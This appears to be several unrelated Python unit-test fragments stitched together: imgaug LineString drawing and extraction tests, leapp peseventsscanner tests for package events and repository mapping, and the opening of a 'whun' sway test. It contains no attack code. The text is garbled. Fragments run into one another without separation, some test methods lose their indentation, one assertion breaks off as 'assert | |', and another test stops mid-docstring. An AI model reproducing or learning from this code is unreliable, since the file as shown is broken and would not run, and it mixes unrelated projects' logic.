        # raise_if_out_of_image=True
        ls = LineString([(0-5, 5), (-1, 5)])
        with self.assertRaises(Exception) as context:
            _img = ls.draw_lines_on_image(
                np.zeros((10, 10, 3), dtype=np.uint8),
                color=(100, 100, 100),
                alpha=1.0, size=3,
                antialiased=False,
                raise_if_out_of_image=True
            )
        assert "Cannot draw line string " in str(context.exception)
    def test_draw_line_on_image_with_line_part_inside_img_and_raise_true(self):
        # raise_if_out_of_image=True BUT line is partially inside image
        # (no point is inside image though)
        ls = LineString([(-1, 5), (11, 5)])
        _img = ls.draw_lines_on_image(
            np.zeros((10, 10, 3), dtype=np.uint8),
            color=(100, 100, 100),
            alpha=1.0, size=3,
            antialiased=False,
            raise_if_out_of_image=True
        )
    # Tests for LineString.draw_points_on_image(): endpoint markers only.
    def test_draw_points_on_image_with_image_of_zeros(self):
        # image of 0s
        ls = LineString([(0, 1), (9, 1)])
        img = ls.draw_points_on_image(
            np.zeros((3, 10, 3), dtype=np.uint8),
            color=(10, 255, 20),
            alpha=1.0, size=3,
            raise_if_out_of_image=False
        )
        assert img.dtype.name == "uint8"
        assert np.all(img[0:2, 0:2, 0] == 10)
        assert np.all(img[0:2, 0:2, 1] == 255)
        assert np.all(img[0:2, 0:2, 2] == 20)
        assert np.all(img[0:2, -2:, 0] == 10)
        assert np.all(img[0:2, -2:, 1] == 255)
        assert np.all(img[0:2, -2:, 2] == 20)
        assert np.all(img[:, 2:-2, :] == 0)
    def test_draw_points_on_image_with_image_of_ones(self):
        # image of 1s
        ls = LineString([(0, 1), (9, 1)])
        img = ls.draw_points_on_image(
            np.ones((3, 10, 3), dtype=np.uint8),
            color=(10, 200, 20),
            alpha=1.0, size=3,
            raise_if_out_of_image=False
        )
        assert img.dtype.name == "uint8"
        assert np.all(img[0:2, 0:2, 0] == 10)
        assert np.all(img[0:2, 0:2, 1] == 200)
        assert np.all(img[0:2, 0:2, 2] == 20)
        assert np.all(img[0:2, -2:, 0] == 10)
        assert np.all(img[0:2, -2:, 1] == 200)
        assert np.all(img[0:2, -2:, 2] == 20)
        assert np.all(img[:, 2:-2, :] == 1)
    def test_draw_points_on_image_with_alpha_50_percent(self):
        # alpha=0.5
        ls = LineString([(0, 1), (9, 1)])
        img = ls.draw_points_on_image(
            np.zeros((3, 10, 3), dtype=np.uint8),
            color=(10, 200, 20),
            alpha=0.5, size=3,
            raise_if_out_of_image=False
        )
        assert np.all(img[0:2, 0:2, 0] == 5)
        assert np.all(img[0:2, 0:2, 1] == 100)
        assert np.all(img[0:2, 0:2, 2] == 10)
        assert np.all(img[0:2, -2:, 0] == 5)
        assert np.all(img[0:2, -2:, 1] == 100)
        assert np.all(img[0:2, -2:, 2] == 10)
        assert np.all(img[:, 2:-2, :] == 0)
    def test_draw_points_on_image_with_size_one(self):
        # size=1
        ls = LineString([(0, 1), (9, 1)])
        img = ls.draw_points_on_image(
            np.zeros((3, 10, 3), dtype=np.uint8),
            color=(10, 200, 20),
            alpha=1.0, size=1,
            raise_if_out_of_image=False
        )
        assert np.all(img[0, :, :] == 0)
        assert np.all(img[2, :, :] == 0)
        assert np.all(img[1, 0, 0] == 10)
        assert np.all(img[1, 0, 1] == 200)
        assert np.all(img[1, 0, 2] == 20)
        assert np.all(img[1, -1, 0] == 10)
        assert np.all(img[1, -1, 1] == 200)
        assert np.all(img[1, -1, 2] == 20)
    def test_draw_points_on_image_with_ls_ooi_and_raise_true(self):
        with self.assertRaises(Exception) as context:
            ls = LineString([(0-5, 1), (9+5, 1)])
            _img = ls.draw_points_on_image(
                np.zeros((3, 10, 3), dtype=np.uint8),
                color=(10, 200, 20),
                alpha=0.5, size=1,
                raise_if_out_of_image=True
            )
        assert "Cannot draw keypoint " in str(context.exception)
    # Tests for LineString.draw_on_image(): parameter forwarding (mocked)
    # and a full end-to-end render (unmocked).
    def test_draw_on_image_with_mocking(self):
        ls = LineString([(0, 1), (9, 1)])
        module_name = "imgaug.augmentables.lines."
        line_fname = "%sLineString.draw_lines_on_image" % (module_name,)
        points_fname = "%sLineString.draw_points_on_image" % (module_name,)
        with mock.patch(line_fname, return_value=1) as mock_line, \
                mock.patch(points_fname, return_value=2) as mock_points:
            _image = ls.draw_on_image(
                np.zeros((10, 10, 3), dtype=np.uint8),
                color=(1, 2, 3), color_lines=(4, 5, 6), color_points=(7, 8, 9),
                alpha=1.0, alpha_lines=0.9, alpha_points=0.8,
                size=1, size_lines=3, size_points=5,
                antialiased=False,
                raise_if_out_of_image=True)
            assert mock_line.call_count == 1
            assert mock_points.call_count == 1
            assert mock_line.call_args_list[0][0][0].shape == (10, 10, 3)
            assert mock_line.call_args_list[0][1]["color"][0] == 4
            assert mock_line.call_args_list[0][1]["color"][1] == 5
            assert mock_line.call_args_list[0][1]["color"][2] == 6
            assert np.isclose(mock_line.call_args_list[0][1]["alpha"], 0.9)
            assert mock_line.call_args_list[0][1]["size"] == 3
            assert mock_line.call_args_list[0][1]["antialiased"] is False
            assert mock_line.call_args_list[0][1]["raise_if_out_of_image"] \
                is True
            assert mock_points.call_args_list[0][0][0] == 1  # mock_line result
            assert mock_points.call_args_list[0][1]["color"][0] == 7
            assert mock_points.call_args_list[0][1]["color"][1] == 8
            assert mock_points.call_args_list[0][1]["color"][2] == 9
            assert np.isclose(mock_points.call_args_list[0][1]["alpha"], 0.8)
            assert mock_points.call_args_list[0][1]["size"] == 5
            assert mock_points.call_args_list[0][1]["raise_if_out_of_image"] \
                is True
    def test_draw_on_image_without_mocking(self):
        ls = LineString([(0, 1), (5, 1), (5, 5)])
        img = ls.draw_on_image(np.zeros((10, 10, 3), dtype=np.uint8),
                               color=(200, 120, 40), alpha=0.5, size=1)
        assert np.all(img[1, 0:5, 0] == 100)
        assert np.all(img[1, 0:5, 1] == 60)
        assert np.all(img[1, 0:5, 2] == 20)
        assert np.all(img[1:5, 5, 0] == 100)
        assert np.all(img[1:5, 5, 1] == 60)
        assert np.all(img[1:5, 5, 2] == 20)
        assert np.all(img[0:2+1, 0:2, 0] >= 50)  # color_points is 0.5*color
        assert np.all(img[0:2+1, 0:2, 1] >= 30)
        assert np.all(img[0:2+1, 0:2, 2] >= 10)
        assert np.all(img[0:2+1, 4:6+1, 0] >= 50)
        assert np.all(img[0:2+1, 4:6+1, 1] >= 30)
        assert np.all(img[0:2+1, 4:6+1, 2] >= 10)
        assert np.all(img[4:6+1, 4:6+1, 0] >= 50)
        assert np.all(img[4:6+1, 4:6+1, 1] >= 30)
        assert np.all(img[4:6+1, 4:6+1, 2] >= 10)
        assert np.all(img[0, 3, :] == 0)
        assert np.all(img[7:, :, :] == 0)
    def test_draw_on_image_with_empty_line_string(self):
        ls = LineString([])
        img = ls.draw_on_image(np.zeros((10, 10, 3), dtype=np.uint8))
        assert img.shape == (10, 10, 3)
        assert np.sum(img) == 0
    # Tests for LineString.extract_from_image(): cropping the image region
    # covered by the line, with various sizes, padding and edge cases.
    def test_extract_from_image_size_1_single_channel(self):
        ls = LineString([(0, 5), (9, 5)])
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        extract = ls.extract_from_image(img, antialiased=False)
        assert extract.shape == (1, 10, 1)
        assert np.array_equal(extract, img[5:6, 0:10, :])
    def test_extract_from_image_size_3_single_channel(self):
        ls = LineString([(1, 5), (8, 5)])
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        extract = ls.extract_from_image(img, size=3, antialiased=False)
        assert extract.shape == (3, 10, 1)
        assert np.array_equal(extract, img[4:6+1, 0:10, :])
    def test_extract_from_image_size_3_rgb(self):
        # size=3, RGB image
        ls = LineString([(1, 5), (8, 5)])
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        img_rgb = np.tile(img, (1, 1, 3))
        img_rgb[..., 1] += 10
        img_rgb[..., 2] += 20
        extract = ls.extract_from_image(img_rgb, size=3, antialiased=False)
        assert extract.shape == (3, 10, 3)
        assert np.array_equal(extract, img_rgb[4:6+1, 0:10, :])
    def test_extract_from_image_antialiased_true(self):
        # weak antialiased=True test
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(1, 1), (9, 9)])
        extract_aa = ls.extract_from_image(img, size=3, antialiased=True)
        extract = ls.extract_from_image(img, size=3, antialiased=False)
        assert extract_aa.shape == extract.shape
        assert np.sum(extract_aa) > np.sum(extract)
    def test_extract_from_image_pad_false(self):
        # pad=False
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(-5, 5), (-3, 5)])
        extract = ls.extract_from_image(img, size=1, antialiased=False,
                                        pad=False, prevent_zero_size=True)
        assert extract.shape == (1, 1, 1)
        assert np.sum(extract) == 0
    def test_extract_from_image_pad_false_and_prevent_zero_size_false(self):
        # pad=False, prevent_zero_size=False
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(-5, 5), (-3, 5)])
        extract = ls.extract_from_image(img, size=1, antialiased=False,
                                        pad=False, prevent_zero_size=False)
        assert extract.shape == (0, 0, 1)
    def test_extract_from_image_pad_max(self):
        # pad_max=1
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(-5, 5), (9, 5)])
        extract = ls.extract_from_image(img, antialiased=False, pad=True,
                                        pad_max=1)
        assert extract.shape == (1, 11, 1)
        assert np.array_equal(extract[:, 1:], img[5:6, 0:10, :])
        assert np.all(extract[0, 0, :] == 0)
    def test_extract_from_image_with_single_point_line_string(self):
        # 1 coord
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(1, 1)])
        extract = ls.extract_from_image(img)
        assert extract.shape == (1, 1, 1)
        # NOTE(review): compares a scalar sum against a 1x1x1 array slice;
        # this passes via numpy broadcasting, but == on the slice directly
        # would be clearer.
        assert np.sum(extract) == img[1:2, 1:2, :]
    def test_extract_from_image_with_single_point_ls_negative_coords(self):
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(-10, -10)])
        extract = ls.extract_from_image(img)
        assert extract.shape == (1, 1, 1)
        assert np.sum(extract) == 0
    def test_extract_from_image_with_1_point_neg_coords_prevent_zero_size(self):
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([(-10, -10)])
        extract = ls.extract_from_image(img, prevent_zero_size=True)
        assert extract.shape == (1, 1, 1)
        assert np.sum(extract) == 0
    def test_extract_from_image_with_empty_line_string(self):
        # 0 coords
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([])
        extract = ls.extract_from_image(img)
        assert extract.shape == (1, 1, 1)
        assert np.sum(extract) == 0
    def test_extract_from_image_with_empty_line_string_prevent_zero_size(self):
        img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
        ls = LineString([])
        extract = ls.extract_from_image(img, prevent_zero_size=False)
        assert extract.shape == (0, 0, 1)
        assert np.sum(extract) == 0
def test_concatenate_line_string_with_itself(self):
ls = LineString([(0, 0), (1, 0), (2, 1)])
ls_concat = ls.concatenate(ls)
assert ls_concat.coords_almost_equals([
(0, 0), (1, 0), (2, 1), (0, 0), (1, 0), (2, 1)
])
def test_concatenate_empty_line_string_with_itself(self):
ls = LineString([])
ls_concat = ls.concatenate(ls)
assert ls_concat.coords_almost_equals([])
def test_concatenate_empty_line_string_with_single_point_line_string(self):
ls = LineString([])
ls_concat = ls.concatenate(LineString([(0, 0)]))
assert ls_concat.coords_almost_equals([(0, 0)])
def test_concatenate_single_point_line_string_with_empty_line_string(self):
ls = LineString([(0, 0)])
ls_concat = ls.concatenate(LineString([]))
assert ls_concat.coords_almost_equals([(0, 0)])
def test_concatenate_empty_line_string_with_list_of_tuples(self):
ls = LineString([])
ls_concat = ls.concatenate([(0, 0)])
assert ls_concat.coords_almost_equals([(0, 0)])
def test_to_keypoints(self):
ls = LineString([(0, 0), (1, 0), (2, 1)])
observed = ls.to_keypoints()
assert all([isinstance(kp, ia.Keypoint) for kp in observed])
assert np.isclose(observed[0].x, 0)
assert np.isclose(observed[0].y, 0)
assert np.isclose(observed[1].x, 1)
assert np.isclose(observed[1].y, 0)
assert np.isclose(observed[2].x, 2)
assert | |
import functools
import os.path
import pytest
from leapp import reporting
from leapp.exceptions import StopActorExecution, StopActorExecutionError
from leapp.libraries.actor import peseventsscanner
from leapp.libraries.actor.peseventsscanner import (
Action,
Event,
SKIPPED_PKGS_MSG,
Task,
add_output_pkgs_to_transaction_conf,
drop_conflicting_release_events,
filter_events_by_architecture,
filter_events_by_releases,
filter_out_pkgs_in_blacklisted_repos,
filter_releases_by_target,
get_events,
map_repositories, parse_action,
parse_entry, parse_packageset,
parse_pes_events,
process_events,
report_skipped_packages,
)
from leapp.libraries.common import fetch
from leapp.libraries.common.testutils import produce_mocked, create_report_mocked, CurrentActorMocked
from leapp.libraries.stdlib import api
from leapp.models import PESIDRepositoryEntry, RpmTransactionTasks, RepositoriesMapping, RepoMapEntry
CUR_DIR = os.path.dirname(os.path.abspath(__file__))  # directory of this test module; used to locate test data files
class show_message_mocked(object):
    """Callable stand-in for api.show_message that records how it was used."""

    def __init__(self):
        # number of invocations and the most recently shown message
        self.called = 0
        self.msg = None

    def __call__(self, msg):
        self.msg = msg
        self.called += 1
class get_repos_blacklisted_mocked(object):
    """Callable stand-in for get_repositories_blacklisted.

    Returns the fixed set of blacklisted repos supplied at construction time.
    """

    def __init__(self, blacklisted):
        self.blacklisted = blacklisted

    def __call__(self):
        return self.blacklisted
def test_parse_action(current_actor_context):
    """Check parse_action maps 0-7 to Action members and rejects out-of-range ids."""
    for i in range(8):
        assert parse_action(i) == Action(i)
    # The original put both calls inside a single `with pytest.raises` block,
    # so parse_action(8) was never executed — the first call already raised
    # and satisfied the context manager. Each call needs its own block.
    with pytest.raises(ValueError):
        parse_action(-1)
    with pytest.raises(ValueError):
        parse_action(8)
def test_parse_packageset(current_actor_context):
    """parse_packageset returns a name->repository mapping, empty when no packages."""
    packageset = {'package': [{'name': 'pkg1', 'repository': 'Repo'}]}
    assert parse_packageset(packageset) == {'pkg1': 'Repo'}
    # dictionaries without a 'package' key yield an empty mapping
    assert parse_packageset({}) == {}
    assert parse_packageset({'setid': 0}) == {}
def test_parse_entry(current_actor_context):
    """
    Tests whether the PES event is correctly parsed from the supplied dictionary with the same
    structure as are the data stored inside the json.
    """
    # action 4 == SPLIT: one input package, two output packages
    split_entry = {
        'action': 4,
        'in_packageset': {
            'package': [{'name': 'original', 'repository': 'repo'}]},
        'out_packageset': {
            'package': [
                {'name': 'split01', 'repository': 'repo'},
                {'name': 'split02', 'repository': 'repo'}]}}
    split_event = parse_entry(split_entry)
    assert split_event.action == Action.SPLIT
    assert split_event.in_pkgs == {'original': 'repo'}
    assert split_event.out_pkgs == {'split01': 'repo', 'split02': 'repo'}

    # action 1 == REMOVED: no output packageset at all
    removal_entry = {
        'action': 1,
        'in_packageset': {
            'package': [{'name': 'removed', 'repository': 'repo'}]}}
    removal_event = parse_entry(removal_entry)
    assert removal_event.action == Action.REMOVED
    assert removal_event.in_pkgs == {'removed': 'repo'}
    assert removal_event.out_pkgs == {}
def test_parse_pes_events(current_actor_context):
    """
    Tests whether all events are correctly parsed from the provided string with the JSON data.
    """
    sample_path = os.path.join(CUR_DIR, 'files/sample01.json')
    with open(sample_path) as sample_file:
        events = parse_pes_events(sample_file.read())
    assert len(events) == 2
    split, removal = events
    assert split.action == Action.SPLIT
    assert split.in_pkgs == {'original': 'repo'}
    assert split.out_pkgs == {'split01': 'repo', 'split02': 'repo'}
    assert removal.action == Action.REMOVED
    assert removal.in_pkgs == {'removed': 'repo'}
    assert removal.out_pkgs == {}
@pytest.mark.parametrize('is_verbose_mode_on', [False, True])
def test_report_skipped_packages_no_verbose_mode(monkeypatch, caplog, is_verbose_mode_on):
    """
    Tests whether the report_skipped_packages function creates message of the expected form
    and that the function respects whether leapp is running in verbose mode.
    """
    monkeypatch.setattr(api, 'produce', produce_mocked())
    monkeypatch.setattr(api, 'show_message', show_message_mocked())
    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
    # verbosity is communicated via the LEAPP_VERBOSE environment variable
    leapp_verbose = '1' if is_verbose_mode_on else '0'
    monkeypatch.setenv('LEAPP_VERBOSE', leapp_verbose)
    report_skipped_packages(
        title='Packages will not be installed',
        message='packages will not be installed:',
        package_repo_pairs=[('skipped01', 'bad_repo01'), ('skipped02', 'bad_repo02')]
    )
    # FIXME(pstodulk): this is obviously wrong. repoid is currently pesid.. so test
    # is incorrect, and code is incorrect. even the message is missleading.
    # this is going to be fixed in close future.
    # Expected text: "<count> <message>" followed by one "- pkg (repoid: repo)"
    # line per package/repo pair.
    message = (
        '2 packages will not be installed:\n'
        '- skipped01 (repoid: bad_repo01)\n'
        '- skipped02 (repoid: bad_repo02)'
    )
    # Verbose level should only control whether show_message is called, report entry should be created
    # in both cases.
    if is_verbose_mode_on:
        assert message in caplog.messages
    else:
        assert api.show_message.called == 0
    assert reporting.create_report.called == 1
    assert reporting.create_report.report_fields['title'] == 'Packages will not be installed'
    assert reporting.create_report.report_fields['summary'] == message
def test_filter_out_pkgs_in_blacklisted_repos(monkeypatch, caplog):
    """
    Verifies that packages from blacklisted repos are filtered out.

    Verifies that the dictionary mapping packages to the target repoids gets correctly cleansed of all entries
    containing a blacklisted target repository when using filter_out_pkgs_in_blacklisted_repos. Also verifies
    that the user gets informed about packages not being installed due to a blacklisted repository.
    """
    monkeypatch.setattr(api, 'show_message', show_message_mocked())
    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
    # treat exactly one repository ('blacklisted') as excluded
    monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted',
                        get_repos_blacklisted_mocked(set(['blacklisted'])))
    monkeypatch.setenv('LEAPP_VERBOSE', '1')
    to_install = {
        'pkg01': 'repo01',
        'pkg02': 'repo02',
        'skipped01': 'blacklisted',
        'skipped02': 'blacklisted',
    }
    # Expected log/report text: "<count> <SKIPPED_PKGS_MSG>" followed by one
    # "- pkg (repoid: repo)" line per blacklisted entry of to_install.
    msg = '2 {}\n{}'.format(
        SKIPPED_PKGS_MSG,
        '\n'.join(
            [
                '- {pkg} (repoid: {repo})'.format(pkg=pkg, repo=repo)
                for pkg, repo in filter(  # pylint: disable=deprecated-lambda
                    lambda item: item[1] == 'blacklisted', to_install.items()
                )
            ]
        )
    )
    # the function mutates to_install in place
    filter_out_pkgs_in_blacklisted_repos(to_install)
    assert msg in caplog.messages
    assert reporting.create_report.called == 1
    assert reporting.create_report.report_fields['summary'] == msg
    assert reporting.create_report.report_fields['title'] == (
        'Packages available in excluded repositories will not be installed'
    )
    # only the non-blacklisted entries survive
    assert to_install == {'pkg01': 'repo01', 'pkg02': 'repo02'}
def test_resolve_conflicting_requests(monkeypatch):
    """
    Verifies that the algorithm correctly resolves conflicting pes events.
    """
    # identity-mock the post-processing steps so the tasks keep the raw repo ids
    monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)
    monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)
    # Conflict: event 1 produces 'sip' as a split output while event 2
    # consumes 'sip' as a split input.
    events = [
        Event(1, Action.SPLIT, {'sip-devel': 'repo'}, {'python3-sip-devel': 'repo', 'sip': 'repo'},
              (7, 6), (8, 0), []),
        Event(2, Action.SPLIT, {'sip': 'repo'}, {'python3-pyqt5-sip': 'repo', 'python3-sip': 'repo'},
              (7, 6), (8, 0), [])]
    installed_pkgs = {'sip', 'sip-devel'}
    tasks = process_events([(8, 0)], events, installed_pkgs)
    assert tasks[Task.INSTALL] == {'python3-sip-devel': 'repo', 'python3-pyqt5-sip': 'repo', 'python3-sip': 'repo'}
    assert tasks[Task.REMOVE] == {'sip-devel': 'repo'}
    # 'sip' is both an output of event 1 and an input of event 2 -> kept
    assert tasks[Task.KEEP] == {'sip': 'repo'}
@pytest.mark.parametrize(('source_repoid', 'expected_target_repoid'),
                         [('rhel7-base-repoid', 'rhel8-crb-repoid'),
                          ('rhel7-base-repoid-eus', 'rhel8-crb-repoid-eus')])
def test_request_pesid_repo_not_mapped_by_default(monkeypatch, source_repoid, expected_target_repoid):
    """
    Tests whether a target repository that is not mapped by default (e.g. CRB)
    is requested to be enabled on the target system if it results from the relevant events.

    Note: Since the resulting target repository is not mapped by default from the enabled repositories,
    the data handler should fail to get expected repoids for the given pesid as it works with enabled
    repositories. Therefore, this test tests whether the fallback lookup with representative repository works.
    """
    # Mapping: rhel7-base -> BaseOS/AppStream by default; CRB is reachable only
    # via rhel7-optional, which is NOT among the enabled repositories below.
    repositories_mapping = RepositoriesMapping(
        mapping=[
            RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),
            RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),
        ],
        repositories=[
            PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
            PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid-eus',
                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
            PESIDRepositoryEntry(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',
                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-eus',
                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
        ])
    monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {source_repoid})
    monkeypatch.setattr(api,
                        'current_actor',
                        CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))
    # the event moves the installed package into the non-default rhel8-CRB pesid
    event = Event(1, Action.MOVED, {'test-pkg': 'rhel7-base'}, {'test-pkg': 'rhel8-CRB'},
                  (7, 9), (8, 0), [])
    installed_pkgs = {'test-pkg'}
    tasks = process_events([(8, 0)], [event], installed_pkgs)
    # the channel (ga/eus) of the enabled source repo determines the CRB variant
    assert tasks[Task.KEEP] == {'test-pkg': expected_target_repoid}
def test_get_repositories_mapping(monkeypatch):
    """
    Tests whether the actor is able to correctly determine the dictionary that maps the target PES ids
    determined from the event processing to the actual target repository ids.
    (tests for the _get_repositories_mapping).
    """
    # shortcut for the common ga/x86_64/rpm repository entry
    make_pesid_repo = functools.partial(PESIDRepositoryEntry, arch='x86_64', repo_type='rpm', channel='ga', rhui='')
    repositories_mapping = RepositoriesMapping(
        mapping=[
            RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),
            RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),
        ],
        repositories=[
            make_pesid_repo(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid'),
            make_pesid_repo(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid'),
            make_pesid_repo(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid'),
            make_pesid_repo(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid'),
            make_pesid_repo(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid'),
            # Extra repositories to make sure the created map contains the correct repoids
            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-azure',
                                 arch='x86_64', repo_type='rpm', channel='ga', rhui='azure'),
            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',
                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-s390x',
                                 arch='s390x', repo_type='rpm', channel='ga', rhui=''),
        ])
    monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {'rhel7-base-repoid'})
    monkeypatch.setattr(api,
                        'current_actor',
                        CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))
    target_pesids = {'rhel8-BaseOS', 'rhel8-AppStream', 'rhel8-CRB'}
    # the plain ga/x86_64 variants should win over the azure/eus/s390x alternatives
    expected_pesid_to_target_repoids = {
        'rhel8-BaseOS': 'rhel8-baseos-repoid',
        'rhel8-AppStream': 'rhel8-appstream-repoid',
        'rhel8-CRB': 'rhel8-crb-repoid'
    }
    actual_pesid_to_target_repoids = peseventsscanner._get_repositories_mapping(target_pesids)
    fail_description = 'Actor failed to determine what repoid to enable for given target pesids.'
    assert actual_pesid_to_target_repoids == expected_pesid_to_target_repoids, fail_description
def test_pesid_to_target_repoids_translation(monkeypatch, caplog):
    """
    Tests whether the actor is able to correctly translate target pesids resulting
    from event processing when it is supplied with a valid dictionary that maps pesids to target repoids.
    """
    monkeypatch.setattr(api, 'show_message', show_message_mocked())
    # only the pesid 'repo' has a known target repoid ('mapped')
    monkeypatch.setattr(peseventsscanner, '_get_repositories_mapping', lambda dummy_target_pesids: {'repo': 'mapped'})
    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
    monkeypatch.setenv('LEAPP_VERBOSE', '1')
    to_install = {
        'pkg01': 'repo',
        'pkg02': 'repo',
        'skipped01': 'not_mapped',
        'skipped02': 'not_mapped'}
    # map_repositories mutates to_install in place
    map_repositories(to_install)
    msg = (
        '2 packages may not be installed or upgraded due to repositories unknown to leapp:\n'
        '- skipped01 (repoid: not_mapped)\n'
        '- skipped02 (repoid: not_mapped)'
    )
    assert msg in caplog.messages
    assert reporting.create_report.called == 1
    assert reporting.create_report.report_fields['title'] == (
        'Packages from unknown repositories may not be installed'
    )
    assert reporting.create_report.report_fields['summary'] == msg
    # entries with unknown pesids are dropped, the rest are translated
    assert to_install == {'pkg01': 'mapped', 'pkg02': 'mapped'}
def test_process_events(monkeypatch):
    """
    Verifies that the event processing algorithm works as expected.
    """
    monkeypatch.setattr(peseventsscanner,
                        '_get_repositories_mapping',
                        lambda dummy_target_pesids: {'rhel8-repo': 'rhel8-mapped'})
    # no repository is blacklisted in this scenario
    monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted', get_repos_blacklisted_mocked(set()))
    events = [
        Event(1, Action.SPLIT, {'original': 'rhel7-repo'}, {'split01': 'rhel8-repo', 'split02': 'rhel8-repo'},
              (7, 6), (8, 0), []),
        Event(2, Action.REMOVED, {'removed': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
        Event(3, Action.PRESENT, {'present': 'rhel8-repo'}, {}, (7, 6), (8, 0), []),
        # this package is present at the start, gets removed and then reintroduced
        Event(4, Action.REMOVED, {'reintroduced': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
        Event(5, Action.PRESENT, {'reintroduced': 'rhel8-repo'}, {}, (8, 0), (8, 1), []),
        # however, this package was never there
        Event(6, Action.REMOVED, {'neverthere': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
        Event(7, Action.PRESENT, {'neverthere': 'rhel8-repo'}, {}, (8, 0), (8, 1), [])]
    installed_pkgs = {'original', 'removed', 'present', 'reintroduced'}
    # process both release hops: (8, 0) and (8, 1)
    tasks = process_events([(8, 0), (8, 1)], events, installed_pkgs)
    assert tasks[Task.INSTALL] == {'split02': 'rhel8-mapped', 'split01': 'rhel8-mapped'}
    assert tasks[Task.REMOVE] == {'removed': 'rhel7-repo', 'original': 'rhel7-repo'}
    assert tasks[Task.KEEP] == {'present': 'rhel8-mapped', 'reintroduced': 'rhel8-mapped'}
def test_get_events(monkeypatch):
"""
Verifies that the actor gracefully handles errors raised when unable to load events | |
import os
import sys
cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(cur_dir)
import unittest
from src.whun.utils.utils import sway, split_bin
from src.whun.whun_helper.item import Item
class TestUtils(unittest.TestCase):
def test_sway(self):
item1 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item2 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
